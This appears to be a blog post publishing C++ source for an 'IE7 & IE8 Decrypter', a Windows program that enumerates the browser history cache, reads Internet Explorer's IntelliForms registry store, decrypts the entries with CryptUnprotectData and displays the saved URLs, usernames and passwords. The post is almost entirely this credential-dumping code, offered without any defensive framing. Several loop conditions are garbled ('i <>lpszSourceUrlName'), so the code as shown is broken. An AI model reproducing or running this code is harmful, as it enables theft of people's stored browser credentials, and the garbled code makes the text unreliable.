[C++ Source] IE7 & IE8 Decrypter
Kartikey Sapra 
#include "windows.h"
#include "wininet.h"
#include "wincrypt.h"

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Crypt32.lib")


void GetHashStr(wchar_t *Input, char *Hash)
{
 Hash[0]='\0';

 HCRYPTPROV hProv = 0;
 HCRYPTHASH hHash = 0;

 CryptAcquireContext(&hProv, 0,0,PROV_RSA_FULL,0);

 if(CryptCreateHash(hProv,CALG_SHA1, 0, 0,&hHash))
 {
  if(CryptHashData(hHash,(unsigned char *)Input,(lstrlenW(Input) + 1)*2,0))
  { 
   BYTE Buffer[20];
   DWORD Length = 20;

   if(CryptGetHashParam(hHash,HP_HASHVAL,Buffer,&Length,0))
   {
    CryptDestroyHash(hHash);
    CryptReleaseContext(hProv, 0);

    char Temporary[128];
    unsigned char Tail=0;

    for(int i = 0; i < 20; i++)
    {
     unsigned char c = Buffer[i];
     Tail += c;
     wsprintfA(Temporary,"%s%2.2X",Hash,c);
     lstrcpyA(Hash,Temporary);
    }
    wsprintfA(Temporary,"%s%2.2X",Hash,Tail);
    lstrcpyA(Hash,Temporary);
   }
  }
 }
}

int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd )
{
 
 HKEY hKey;
 if(RegCreateKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", 0, 0, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS, NULL, &hKey, 0) == ERROR_SUCCESS)
 {
  unsigned long InfoSize = 0;
  FindFirstUrlCacheEntryA(0, 0, &InfoSize);

  INTERNET_CACHE_ENTRY_INFO *iCacheEntryInfo = new INTERNET_CACHE_ENTRY_INFO[InfoSize];
  iCacheEntryInfo->dwStructSize = InfoSize;
  
  HANDLE handle;
  if((handle = FindFirstUrlCacheEntryA(0, iCacheEntryInfo, &InfoSize)) == 0) return 0;

  do
  {    
   if(iCacheEntryInfo->CacheEntryType == URLHISTORY_CACHE_ENTRY | NORMAL_CACHE_ENTRY)
   {
    int i = 0;
    for(; i <>lpszSourceUrlName); i++)
     if(iCacheEntryInfo->lpszSourceUrlName[i] == '@')break;

    char URL[512];
    ZeroMemory(URL, 512);

    int j = 0;
    for(i++; i <>lpszSourceUrlName); j += 2 , i++)
      URL[j] = iCacheEntryInfo->lpszSourceUrlName[i];

    URL[j] = '/';

    char Hash[128];
    GetHashStr((wchar_t*)URL, Hash);

    DWORD BufferSize;
    RegQueryValueEx(hKey, Hash, 0, 0, 0, &BufferSize);

    BYTE *Buffer = new BYTE[BufferSize];

    if(RegQueryValueEx(hKey, Hash, 0, 0, Buffer,&BufferSize) == ERROR_SUCCESS)
    {
     DATA_BLOB In, Out, Optional;

     In.cbData = BufferSize;
     Optional.cbData = j + 4;

     In.pbData = Buffer;
     Optional.pbData = (unsigned char *)URL;

     if(CryptUnprotectData(&In, NULL, &Optional, NULL, NULL, 1, &Out))
     {
      DWORD HeaderSize, DataOffset1, DataOffset2;

      memcpy(&HeaderSize, (void *)(Out.pbData + 4), 4);
      HeaderSize += 12;
      memcpy(&DataOffset1, (void *)(Out.pbData + 36), 4);
      memcpy(&DataOffset2, (void *)(Out.pbData + 52), 4);

      char FileBuffer[512];
      wsprintfA(FileBuffer, "===============================================\n"
       "URL : %ls\n"
       "Username : %ls\n"
       "Password : %ls\n"
       "===============================================\n\n",
       (char *)URL,
       (char *)(Out.pbData + HeaderSize + DataOffset1),
       (char *)(Out.pbData + HeaderSize + DataOffset2));


      MessageBoxA(0, FileBuffer, "", MB_OK);
     }   
    }
    delete[] Buffer; 
   }
   InfoSize = 0;
   FindNextUrlCacheEntry(handle, 0, &InfoSize);
  }
  while(FindNextUrlCacheEntryA(handle, iCacheEntryInfo, &InfoSize)); 
 }
 RegCloseKey(hKey);

 return 0;
}
Labels:
0 Responses

Post a Comment

Subscribe to: Post Comments (Atom)